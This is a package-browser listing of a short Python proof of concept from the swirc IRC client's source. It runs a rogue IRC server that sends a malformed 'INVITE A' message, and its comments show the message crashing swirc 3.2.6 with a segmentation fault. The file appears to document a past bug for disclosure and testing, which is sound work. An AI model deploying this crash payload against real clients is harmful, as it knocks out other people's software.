File: swirc.msg.py

package info (click to toggle)
swirc 3.5.6-1
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid
  • size: 2,988 kB
  • sloc: ansic: 18,321; cpp: 17,795; sh: 968; python: 254; makefile: 104; javascript: 20
file content (42 lines) | stat: -rw-r--r-- 853 bytes parent folder | download | duplicates (3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python
# SPDX-License-Identifier: MIT
# Copyright (c) 2021 Michael Ortmann

# Description:
#
#   swirc.msg.py is a proof of concept for malicious irc server message could
#   crash swirc.
#
#   Compatible with python 2 and 3.
#
# Example:
#
#   $ python swirc.msg.py
#   listening on host 0.0.0.0 port 6667
#
#   $ swirc -s 127.0.0.1 -n alice
#
#   sent malicious message to host 127.0.0.1 port 40526
#
#   Segmentation fault (core dumped)
#
# Tested on:
#
#   swirc 3.2.6

import socket

host = ""
port = 6667

address = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(address)
s.listen(10)
print("listening on host %s port %s" % s.getsockname());

conn, address = s.accept()
data = conn.recv(512)
conn.sendall("INVITE A\n".encode('utf-8'))
print("sent malicious message to host %s port %s" % address)
conn.close()